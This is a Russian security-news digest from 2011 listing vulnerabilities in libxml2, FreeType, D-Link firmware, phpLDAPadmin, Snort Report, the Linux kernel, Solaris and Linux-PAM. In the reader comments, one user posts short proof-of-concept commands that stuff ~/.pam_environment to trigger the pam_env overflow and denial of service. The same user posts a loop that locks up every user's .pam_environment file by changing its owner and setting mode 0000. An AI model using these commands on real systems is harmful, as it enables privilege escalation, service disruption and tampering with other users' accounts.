The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

Уязвимости в Libxml, FreeType, D-Link, phpLDAPadmin, ядре Linux, Solaris, Snort Report и Linux-PAM

30.10.2011 20:59

Несколько недавно обнаруженных уязвимостей:

  • В открытой библиотеке Libxml2 найдены две уязвимости, вызванные обращением в коде к уже освобождённым блокам памяти. Теоретически уязвимости могут быть использованы для организации выполнения кода злоумышленника при обработке специально оформленных XPath-запросов. Проблема устранена в Git-репозитории проекта;
  • В библиотеке для рендеринга шрифтов FreeType 2.4.7 устранена опасная уязвимость, которая может привести к выполнению кода злоумышленника при обработке специально скомпонованного шрифта Type 1;
  • В реализации SSH-сервера из состава прошивок некоторых продуктов D-Link (например, коммутаторы DES-3800 и беспроводные маршрутизаторы DWL-2100AP/DWL-3200AP) найдена опасная уязвимость, позволяющая удалённо выполнить свой код на оборудовании D-Link. Проблема устранена в специально выпущенном обновлении прошивки;
  • В системе управления LDAP-каталогом phpLDAPadmin найдена уязвимость, позволяющая организовать выполнение PHP-кода на сервере через передачу специально оформленных аргументов запроса в URL. Проблема устранена в версии 1.2.2;
  • Компания Oracle выпустила порцию обновлений для Solaris, в которой устранено 15 уязвимостей из которых 9 можно эксплуатировать удалённо. Проблема в библиотеке LDAP может привести к выполнению кода злоумышленника. Проблемы в ZFS, libnsl и xscreensaver могут привести к утечке закрытой информации. Остальные проблемы могут быть использованы для инициирования отказа в обслуживании;
  • В генераторе отчётов Snort Report 1.3.2 устранена уязвимость, которая позволяет выполнить произвольные shell-команды на сервере, путём передачи некорректных значений параметра "target" для скриптов nmap.php и nbtscan.php;
  • Несколько уязвимостей в ядре Linux:
    • Переполнение буфера в функции "xfs_readlink()" может привести к выполнению кода злоумышленника при монтировании специально оформленного XFS-раздела;
    • Уязвимость в реализации AppArmor может привести к краху ядра при записи некорректных значений в файл "/attr/current" для процессов в иерархии "/proc";
    • Возможность инициирования краха ядра через манипуляцию с экстентами в файловой системе Ext4;
    • Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL;
  • В модуле "pam_env" из состава пакета Linux-PAM обнаружены две уязвимости. Первая уязвимость может привести к повышению привилегий локального пользователя в связи с переполнением буфера при обработке специально оформленного файла "~/.pam_environment". Вторая уязвимость может привести к совершению DoS-атаки через создание излишней нагрузки на CPU при обработке специально скомпонованных переменных окружения.


Лицензия: CC BY 3.0
Короткая ссылка: https://opennet.ru/32170-security
Ключевые слова: security
При перепечатке указание ссылки на opennet.ru обязательно


Обсуждение (5) RSS
  • 1.1, pavlinux (ok), 23:33, 30/10/2011 [ответить]  
  • +/
    > Переполнение буфера в функции "xfs_readlink()" может привести к
    > выполнению кода злоумышленника при монтировании специально
    > оформленного XFS-раздела;

    Судя по патчу, надо сделать длиннющую, больше MAXPATHLEN, ссылку.

    PAM :)



    perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
    perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
    perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
    perl -e 'print " " x 256, "\\";' >> ~/.pam_environment
    perl -e 'print "A" x 256;' >> ~/.pam_environment


    и ещё...



    cat <<EOM >~/.pam_environment

    EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
    EVIL_FILLER_256 DEFAULT=${EVIL_FILLER_255}B
    EVIL_FILLER_1024 DEFAULT=${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}
    EVIL_FILLER_8191 DEFAULT=${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_1024}${EVIL_FILLER_1024}${EVIL_FILLER_1024} ${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_256}${EVIL_FILLER_255}
    EVIL_OVERFLOW_DOS DEFAULT=${EVIL_FILLER_8191}AAAA
    EOM



     
     
  • 2.2, pavlinux (ok), 00:36, 31/10/2011 [^] [^^] [^^^] [ответить]  
  • +1 +/
    Как вариант



    for users in 'ls /home/'
       do
        echo -ne > $users/.pam_environment;
        chown 65499:65499 $users/.pam_environment;
        chmod 0000 $users/.pam_environment;
    done


    Пущай мучаются :)

     
  • 2.9, pavlinux (ok), 19:06, 31/10/2011 [^] [^^] [^^^] [ответить]  
  • +/
    > EVIL_FILLER_255 DEFAULT=BBB...BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB

    Кстати, в debian не работает, пишет [pam_env]: unknown variable EVIL_FILLER_255 ...


     

  • 1.8, Аноним (-), 16:49, 31/10/2011 [ответить]  
  • +/
    очередной урожай уязвимостей ?

    Уязвимость в реализации алгоритма GHASH, которая может привести к разыменованию указателя NULL;  -  O_O  !!!

    Уязвимость в реализации AppArmor - я прям на бомбе замедленного действия )))
    Возможность инициирования краха ядра - дважды )))!!!!

    В реализации SSH-сервера - а вот это интерестно, пригодится

     
  • 1.10, Аноним (-), 16:54, 01/11/2011 [ответить]  
  • +/
    А где взять новую прошивку для DWL-2100AP?
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2025 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру